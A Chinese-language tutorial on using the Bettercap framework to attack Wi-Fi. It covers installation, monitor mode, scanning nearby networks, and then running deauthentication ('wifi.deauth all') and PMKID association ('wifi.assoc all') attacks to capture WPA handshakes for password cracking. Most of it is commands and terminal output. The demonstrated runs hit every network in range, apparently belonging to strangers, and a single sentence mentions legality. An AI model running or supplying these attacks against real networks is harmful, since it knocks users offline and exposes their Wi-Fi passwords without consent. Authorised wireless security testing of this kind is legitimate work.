技术笔记

Bettercap破解Wi-Fi网络

Bettercap是一个非常强大、灵活可移植的中间人攻击框架,它具有跨平台、轻量级以及模块化等优点,在渗透测试过程中能够非常好的进行中间人测试。我们将使用Bettercap的两个模块来帮助我们搜索弱的Wi-Fi密码。

安装Bettercap

如果安装了Kali Linux,则可以在“应用程序”菜单中的“嗅探和欺骗”文件夹中或通过搜索找到它。

~# apt install bettercap

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
  liblinear3
Use 'apt autoremove' to remove it.
The following additional packages will be installed:
  bettercap-caplets
Suggested packages:
  bettercap-ui
The following NEW packages will be installed:
  bettercap bettercap-caplets
0 upgraded, 2 newly installed, 0 to remove and 1854 not upgraded.
Need to get 6,931 kB of archives.
After this operation, 25.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap amd64 2.26.1-0kali1 [6,821 kB]
Get:2 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap-caplets all 0+git20191009-0kali1 [110 kB]
Fetched 6,931 kB in 3s (2,332 kB/s)
Selecting previously unselected package bettercap.
(Reading database ... 417705 files and directories currently installed.)
Preparing to unpack .../bettercap_2.26.1-0kali1_amd64.deb ...
Unpacking bettercap (2.26.1-0kali1) ...
Selecting previously unselected package bettercap-caplets.
Preparing to unpack .../bettercap-caplets_0+git20191009-0kali1_all.deb ...
Unpacking bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap (2.26.1-0kali1) ...
bettercap.service is a disabled or a static unit, not starting it.

启动Bettercap

Usage of bettercap:
  -autostart string
        Comma separated list of modules to auto start. (default "events.stream")
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -cpu-profile file
        Write cpu profile file.
  -debug
        Print debug messages.
  -env-file string
        Load environment variables from this file if found, set to empty to disable environment persistence.
  -eval string
        Run one or more commands separated by ; in the interactive session, used to set variables via command line.
  -gateway-override string
        Use the provided IP address instead of the default gateway. If not specified or invalid, the default gateway will be used.
  -iface string
        Network interface to bind to, if empty the default interface will be auto selected.
  -mem-profile file
        Write memory profile to file.
  -no-colors
        Disable output color effects.
  -no-history
        Disable interactive session history file.
  -silent
        Suppress all logs which are not errors.
  -version
        Print the version and exit.

iface,它允许我们定义要使用的接口

连接网络适配器并开始

现在,我们需要将卡置于监视模式。如果我们已经连接到Wi-Fi网络,则Bettercap会开始嗅探该网络,因此始终以监视模式为第一位。

使用ifconfigip a找到您的网卡,以找到您的网络适配器的名称。对于内部适配器,应为wlan0;对于USB网络适配器,应为wlan1

~# ifconfig

eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 50:7b:9d:7a:c8:8a  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 38625  bytes 3052647 (2.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 38625  bytes 3052647 (2.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.5.93  netmask 255.255.255.0  broadcast 192.168.5.255
        inet6  prefixlen 64  scopeid 0x20<link>
        ether   txqueuelen 1000  (Ethernet)
        RX packets 451  bytes 119964 (117.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 364  bytes 115672 (112.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 18:d6:c7:0e:e7:a1  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

使用与监视器模式兼容的适配器,然后通过打开终端窗口并键入airmon-ng start wlan1,将wlan1替换为网络适配器的名称

~# airmon-ng start wlan1

Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

  PID Name
  559 NetworkManager
  621 wpa_supplicant
14785 dhclient

PHY Interface   Driver      Chipset

phy0    wlan0       ath9k       Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy3    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

        (mac80211 monitor mode vif enabled for [phy3]wlan1 on [phy3]wlan1mon)
        (mac80211 station mode vif disabled for [phy3]wlan1)

然后,您可以再次键入ifconfigipa来验证它是否已启动。

~# ifconfig

eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 50:7b:9d:7a:c8:8a  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 38645  bytes 3053647 (2.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 38645  bytes 3053647 (2.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.5.93  netmask 255.255.255.0  broadcast 192.168.5.255
        inet6  prefixlen 64  scopeid 0x20<link>
        ether  txqueuelen 1000  (Ethernet)
        RX packets 490  bytes 126996 (124.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 386  bytes 126911 (123.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 18-D6-C7-0E-E7-A1-30-3A-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 1202  bytes 363761 (355.2 KiB)
        RX errors 0  dropped 1176  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

确保无线卡处于监视模式后,可以通过在新的终端窗口中键入sudo Bettercap --iface wlan1mon来启动Bettercap,用卡名替换“ wlan1”部分。

~# sudo bettercap --iface wlan1mon

bettercap v2.24.1 (built for linux amd64 with go1.12.7) [type 'help' for a list of commands]

wlan1  »

Bettercap打开后,键入help以查看所有正在运行的模块和命令的列表。在模块中,您可以看到默认情况下未启动Wi-Fi模块。

wlan1  » help

           help MODULE : List available commands or show module specific help if no module name is provided.
                active : Show information about active modules.
                  quit : Close the session and exit.
         sleep SECONDS : Sleep for the given amount of seconds.
              get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
        set NAME VALUE : Set the VALUE of variable NAME.
  read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
                 clear : Clear the screen.
        include CAPLET : Load and run this caplet in the current session.
             ! COMMAND : Execute a shell command and print its output.
        alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

Modules

      any.proxy > not running
       api.rest > not running
      arp.spoof > not running
      ble.recon > not running
        caplets > not running
    dhcp6.spoof > not running
      dns.spoof > not running
  events.stream > running
            gps > not running
     http.proxy > not running
    http.server > not running
    https.proxy > not running
   https.server > not running
    mac.changer > not running
   mysql.server > not running
      net.probe > not running
      net.recon > running
      net.sniff > not running
   packet.proxy > not running
       syn.scan > not running
      tcp.proxy > not running
         ticker > not running
         update > not running
           wifi > not running
            wol > not running

扫描附近的网络

我们可以在Wi-Fi模块下发出的命令。我们可以通过在Bettercap中键入help wifi来查看此信息。

wlan1  » help wifi

wifi (running): A module to monitor and perform wireless attacks on 802.11.

        wifi.recon on : Start 802.11 wireless base stations discovery and channel hopping.
       wifi.recon off : Stop 802.11 wireless base stations discovery and channel hopping.
           wifi.clear : Clear all access points collected by the WiFi discovery module.
       wifi.recon MAC : Set 802.11 base station address to filter for.
     wifi.recon clear : Remove the 802.11 base station filter.
    wifi.deauth BSSID : Start a 802.11 deauth attack, if an access point BSSID is provided, every client will be deauthenticated, otherwise only the selected client. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate every access point with at least one client and start a deauth attack for each one.
     wifi.assoc BSSID : Send an association request to the selected BSSID in order to receive a RSN PMKID key. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate for every access point.
              wifi.ap : Inject fake management beacons in order to create a rogue access point.
  wifi.show.wps BSSID : Show WPS information about a given station (use 'all', '*' or a broadcast BSSID for all).
            wifi.show : Show current wireless stations list (default sorting by essid).
   wifi.recon.channel : WiFi channels (comma separated) or 'clear' for channel hopping.

  Parameters

         wifi.ap.bssid : BSSID of the fake access point. (default=<random mac>)
       wifi.ap.channel : Channel of the fake access point. (default=1)
    wifi.ap.encryption : If true, the fake access point will use WPA2, otherwise it'll result as an open AP. (default=true)
          wifi.ap.ssid : SSID of the fake access point. (default=FreeWiFi)
       wifi.assoc.open : Send association requests to open networks. (default=false)
     wifi.assoc.silent : If true, messages from wifi.assoc will be suppressed. (default=false)
       wifi.assoc.skip : Comma separated list of BSSID to skip while sending association requests. (default=)
      wifi.deauth.open : Send wifi deauth packets to open networks. (default=true)
    wifi.deauth.silent : If true, messages from wifi.deauth will be suppressed. (default=false)
      wifi.deauth.skip : Comma separated list of BSSID to skip while sending deauth packets. (default=)
  wifi.handshakes.file : File path of the pcap file to save handshakes to. (default=~/bettercap-wifi-handshakes.pcap)
       wifi.hop.period : If channel hopping is enabled (empty wifi.recon.channel), this is the time in milliseconds the algorithm will hop on every channel (it'll be doubled if both 2.4 and 5.0 bands are available). (default=250)
           wifi.region : Set the WiFi region to this value before activating the interface. (default=BO)
         wifi.rssi.min : Minimum WiFi signal strength in dBm. (default=-200)
      wifi.show.filter : Defines a regular expression filter for wifi.show (default=)
       wifi.show.limit : Defines limit for wifi.show (default=0)
        wifi.show.sort : Defines sorting field (rssi, bssid, essid, channel, encryption, clients, seen, sent, rcvd) and direction (asc or desc) for wifi.show (default=rssi asc)
      wifi.skip-broken : If true, dot11 packets with an invalid checksum will be skipped. (default=true)
      wifi.source.file : If set, the wifi module will read from this pcap file instead of the hardware interface. (default=)
          wifi.txpower : Set WiFi transmission power to this value before activating the interface. (default=30)

我们将选择Wi-Fi侦听模块。要启动它,请在 Bettercap中键入wifi.recon。一旦开始检测到网络,您将开始收到大量的消息。如果不知所措,则可以键入events.stream off以使警报静音。

wlan1  » wifi.recon on

[23:01:35] [sys.log] [inf] wifi WiFi region set to 'BO'
[23:01:35] [sys.log] [inf] wifi interface wlan1 txpower set to 30
[23:01:35] [sys.log] [inf] wifi started (min rssi: -200 dBm)
wlan1  » [23:01:35] [sys.log] [inf] wifi channel hopper started
wlan1  » [23:01:35] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:35] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:35] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:36] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:36] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:36] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:36] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:37] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:37] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:37] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:37] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:38] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:38] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:01:38] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:01:39] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:39] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:01:39] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:41] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:41] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:41] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:01:42] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:42] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:01:42] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:01:42] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:42] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:43] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:52] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:52] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1  » [23:01:52] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████

要查看已检测到的网络,请键入wifi.show以显示网络列表。

wlan1  »  wifi.show

+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴  |       BSSID       |             SSID              |    Encryption    | WPS | Ch | Clients |  Sent  | Recvd  |   Seen   |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (TKIP, PSK) |     | 6  |         |        |        | 23:01:35 |
| -57 dBm | ██:██:██:██:██:██ | █████████████                 | OPEN             |     | 6  | 1       | 400 B  | 66 B   | 23:01:36 |
| -63 dBm | ██:██:██:██:██:██ | ██████                        | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:01:36 |
| -64 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) | 2.0 | 5  | 1       | 7.1 kB | 128 B  | 23:01:37 |
| -66 dBm | ██:██:██:██:██:██ | ████████████████              | WPA (TKIP, PSK)  |     | 1  |         |        |        | 23:01:39 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 1  |         |        |        | 23:01:35 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████  | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:01:35 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████              | OPEN             |     | 11 |         |        |        | 23:01:43 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████      | WPA2 (CCMP, PSK) |     | 7  |         |        |        | 23:01:43 |
| -82 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) | 2.0 | 6  |         | 3.9 kB |        | 23:01:39 |
| -86 dBm | ██:██:██:██:██:██ | ████████████████              | OPEN             |     | 1  | 1       |        | 177 B  | 23:01:35 |
| -86 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, MGT) |     | 1  |         |        |        | 23:01:38 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:01:38 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████                | WPA2 (CCMP, PSK) |     | 6  | 1       | 670 B  | 384 B  | 23:01:39 |
| -86 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:01:39 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:01:37 |
| -87 dBm | ██:██:██:██:██:██ | █████████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 8  |         |        |        | 23:01:36 |
| -87 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, PSK) |     | 6  |         | 759 B  |        | 23:01:44 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████          | OPEN             |     | 6  | 1       | 228 B  | 1.2 kB | 23:01:43 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:01:44 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████            | OPEN             |     | 8  |         |        |        | 23:01:41 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:01:41 |
| -90 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:01:41 |
| -91 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) |     | 11 |         |        |        | 23:01:41 |
| -92 dBm | ██:██:██:██:██:██ | ██                            | WPA2 (CCMP, PSK) | 2.0 | 11 |         |        |        | 23:01:35 |
| -92 dBm | ██:██:██:██:██:██ | <hidden>                      | OPEN             |     | 6  |         |        |        | 23:01:37 |
| -92 dBm | ██:██:██:██:██:██ | ████████                      | WPA2 (TKIP, PSK) |     | 11 |         |        |        | 23:01:37 |
| -94 dBm | ██:██:██:██:██:██ | █████████████████████████     | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:01:37 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████    | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:01:42 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████             | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:01:41 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+

wlan1mon (ch. 12) / ↑ 0 B / ↓ 1.5 MB / 6556 pkts

我们可以看到有关我们附近无线环境的大量信息,例如哪些网络最强大以及它们使用哪种加密。

使用Deauth攻击进行攻击

要启动deauth模块,您将键入wifi.deauth,然后键入您要攻击的网络的MAC地址。如果您想攻击找到的每个网络,则可以键入all或*,但是请注意,如果您干扰某人的Wi-Fi,而该Wi-Fi不允许您对其进行测试,则这可能是非法的。

wlan1  » wifi.deauth all

wlan1  » [23:02:53] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:54] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:02:55] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:55] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:02:56] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:57] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:02:57] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:58] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:02:59] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:03:00] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:03:01] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:01] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:02] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:02] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:03:03] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:04] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:04] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████

wifi.show并查看是否有红色结果来查看结果。在我们的示例中,我们可以看到我们已成功为我们检测到的附近三个Wi-Fi网络握手。

wlan1  » wifi.show

+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴  |       BSSID       |             SSID              |    Encryption    | WPS | Ch | Clients |  Sent  | Recvd  |   Seen   |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, PSK) |     | 6  | 5       | 12 kB  |        | 23:03:06 |
| -57 dBm | ██:██:██:██:██:██ | █████████████                 | WPA2 (CCMP, PSK) |     | 6  | 1       | 6.5 kB | 66 B   | 23:03:04 |
| -63 dBm | ██:██:██:██:██:██ | ██████                        | WPA2 (CCMP, PSK) |     | 11 | 2       | 1.2 kB |        | 23:03:04 |
| -64 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (CCMP, PSK) | 2.0 | 5  | 2       | 7.1 kB | 128 B  | 23:03:02 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 1  | 2       | 353 B  |        | 23:03:05 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████  | WPA2 (CCMP, PSK) |     | 6  | 1       | 4.9 kB |        | 23:03:06 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████              | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:03:06 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████      | WPA2 (CCMP, PSK) |     | 7  |         |        |        | 23:03:07 |
| -86 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, PSK) |     | 1  |         |        |        | 23:03:01 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:03:02 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████                | WPA2 (CCMP, PSK) |     | 6  |         | 670 B  | 384 B  | 23:03:02 |
| -86 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:03:01 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:03:01 |
| -87 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, PSK) |     | 6  |         | 759 B  |        | 23:03:02 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████          | WPA2 (CCMP, PSK) |     | 6  |         | 228 B  | 1.2 kB | 23:03:04 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:03:04 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████            | WPA2 (CCMP, PSK) |     | 8  |         |        |        | 23:03:04 |
| -90 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:03:06 |
| -91 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) |     | 11 |         | 1.7 kB |        | 23:03:04 |
| -92 dBm | ██:██:██:██:██:██ | ██                            | WPA2 (CCMP, PSK) | 2.0 | 11 |         |        |        | 23:03:08 |
| -92 dBm | ██:██:██:██:██:██ | ████████                      | WPA2 (TKIP, PSK) |     | 11 |         |        |        | 23:03:08 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████    | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:03:09 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████             | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:03:09 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+

wlan1mon (ch. 12) / ↑ 73 kB / ↓ 8.9 MB / 28100 pkts / 2 handshakes

使用set wifi.handshake,然后使用要在其中保存文件的目录。

wlan1  » set wifi.handshakes '/desiredfolderlocation'

用PMKID攻击进行攻击

要开始网络进行攻击,wifi.assoc,然后输入我们要攻击的MAC地址。如果我们要攻击我们检测到的所有网络,请输入all或*代替。如果关闭了events.stream,但是希望看到此模块的结果,则可以通过在on上键入events.stream并监视如下所示的结果来重新启用事件流。

wlan1  » wifi.assoc all

wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap

看一下wifi.show的结果。如果幸运的话,我们应该看到更多的红色网络。尽管下面没有颜色,但其中有五个确实是红色。

wlan1  » wifi.show

+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴  |       BSSID       |             SSID              |    Encryption    | WPS | Ch | Clients |  Sent  | Recvd  |   Seen   |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, PSK) |     | 6  | 5       | 12 kB  |        | 23:04:36 |
| -57 dBm | ██:██:██:██:██:██ | █████████████                 | WPA2 (CCMP, PSK) |     | 6  | 1       | 6.5 kB | 66 B   | 23:04:34 |
| -63 dBm | ██:██:██:██:██:██ | ██████                        | WPA2 (CCMP, PSK) |     | 11 | 2       | 1.2 kB |        | 23:04:34 |
| -64 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (CCMP, PSK) | 2.0 | 5  | 2       | 7.1 kB | 128 B  | 23:04:32 |
| -90 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:04:36 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 1  | 2       | 353 B  |        | 23:04:35 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████  | WPA2 (CCMP, PSK) |     | 6  | 1       | 4.9 kB |        | 23:04:36 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:04:31 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████              | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:04:36 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████      | WPA2 (CCMP, PSK) |     | 7  |         |        |        | 23:04:37 |
| -86 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, PSK) |     | 1  |         |        |        | 23:04:31 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:04:32 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████                | WPA2 (CCMP, PSK) |     | 6  |         | 670 B  | 384 B  | 23:04:32 |
| -86 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:04:31 |
| -87 dBm | ██:██:██:██:██:██ | <hidden>                      | WPA2 (CCMP, PSK) |     | 6  |         | 759 B  |        | 23:04:32 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████          | WPA2 (CCMP, PSK) |     | 6  |         | 228 B  | 1.2 kB | 23:04:34 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:04:34 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████            | WPA2 (CCMP, PSK) |     | 8  |         |        |        | 23:04:34 |
| -91 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) |     | 11 |         | 1.7 kB |        | 23:04:34 |
| -92 dBm | ██:██:██:██:██:██ | ██                            | WPA2 (CCMP, PSK) | 2.0 | 11 |         |        |        | 23:04:38 |
| -92 dBm | ██:██:██:██:██:██ | ████████                      | WPA2 (TKIP, PSK) |     | 11 |         |        |        | 23:04:38 |
